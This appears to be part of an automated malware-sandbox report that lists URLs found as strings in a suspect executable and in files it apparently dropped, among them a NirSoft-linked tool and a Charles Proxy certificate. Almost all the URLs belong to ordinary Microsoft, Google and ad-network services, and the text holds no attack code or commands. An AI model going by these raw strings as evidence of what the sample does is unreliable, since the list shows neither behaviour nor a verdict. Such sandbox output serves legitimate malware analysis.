Source: aOn5CfTiwS.exe, 00000000.00000003.226749595.00000000022AA000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplay
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.0.dr String found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.0.dr String found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: xldl.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: xldl.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: xldl.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html8
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.htmlMT
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://www.msn.com
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://www.msn.com/
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1612058829275.exe, 00000001.00000002.224509570.0000000000198000.00000004.00000010.sdmp String found in binary or memory: http://www.nirsoft.net
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 1612058829275.exe.0.dr String found in binary or memory: http://www.nirsoft.net/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, download_engine.dll.0.dr String found in binary or memory: http://www.openssl.org/support/faq.html
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, download_engine.dll.0.dr String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: aOn5CfTiwS.exe String found in binary or memory: http://www.synametrics.com
Source: download_engine.dll.0.dr String found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.0.dr String found in binary or memory: http://www.xunlei.com/GET
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr String found in binary or memory: https://charlesproxy.com/ssl1
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://contextual.media.net/
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://pki.goog/repository/0
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp String found in binary or memory: https://static.nc
Source: aOn5CfTiwS.exe String found in binary or memory: https://static.nc-img.com/pp/nc-ui-global
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/mainLegacy.bb0357e72b1f882521990fd54c3c08d1.css
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-300-webfont.96dd56ebb50aa0150f6630360d8d69cf
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-500-webfont.5d9883d92e2eaa724e4e6beb0ef6728a
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-700-webfont.b125dc012841fa8a23b98c37499ca5e8
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd.js
Source: aOn5CfTiwS.exe String found in binary or memory: https://static.nc-img.com/uiraa/app.ab29bfd164428d10f
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/uiraa/app.ab29bfd164428d10f32bc34df1cad4ed.css
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/uiraa/libs/polyfills_469970f8ffedace1b5b8
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp String found in binary or memory: https://static.nc-img.com/uiraa/libs/vendors_70ac76496c2b0e5ed06c
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.216545630.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.216627184.0000000002DF6000.00000004.00000040.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.216545630.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flashc
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.216590880.00000000022A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime%
Source: aOn5CfTiwS.exe, 00000000.00000003.216590880.00000000022A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwaveltG
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, ecv71A3.tmp.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
